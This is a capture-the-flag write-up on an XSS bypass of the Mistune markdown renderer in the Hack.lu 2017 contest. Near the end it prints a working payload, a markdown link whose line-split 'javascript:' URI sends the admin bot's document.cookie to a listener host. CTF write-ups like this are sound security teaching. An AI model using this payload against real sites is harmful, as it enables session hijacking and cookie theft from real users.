Hack.lu 2017 CTF | Mistune Writeup

This challenge was under the category of web and pwn, if I remember correctly.

It welcomed us with this page:

Of course, the 'Test the Markdown Engine' box was empty, just like the space between those thick black lines where the 'Result' is shown.

There was another button, 'Send to Admin', which looked like this:

It basically was another box where you had to place whatever worked in the first one.

With everything in blank, the clues that were given were:

• We use mistune.Renderer(escape=True, hard_wrap=True)

After a quick google search, we found that Mistune is 'The faster markdown parser in pure Python with renderer features (...)'. 

A little bit to the bottom, we can see the same example being shown, where it is explained that the escape=True part will escape any HTML tags it encounters, and the hard_wrap=True part, all newlines will be replaced with <br> tags.

• The admin will look at your converted Markdown

The admin is a bot, for the surprise of all.

• The admin will click on links (<a>)

The bot admin will click any link and send the flag the wherever the link leads (you can see how the bot would see the link in the first image, bottom left corner).

~~~~The vulnerability~~~~

Finally, a friend realized that newlines were not scaped, and that mixed with this vulnerability, left us a perfect way to send the cookie to my friend's listener:

[flower](java
script:
document.location= "https://censored-site:8888/whatnow?c=" + document.cookie;)

And with that, my friend checked the logs and shared with my the precious flag worth 150 points :)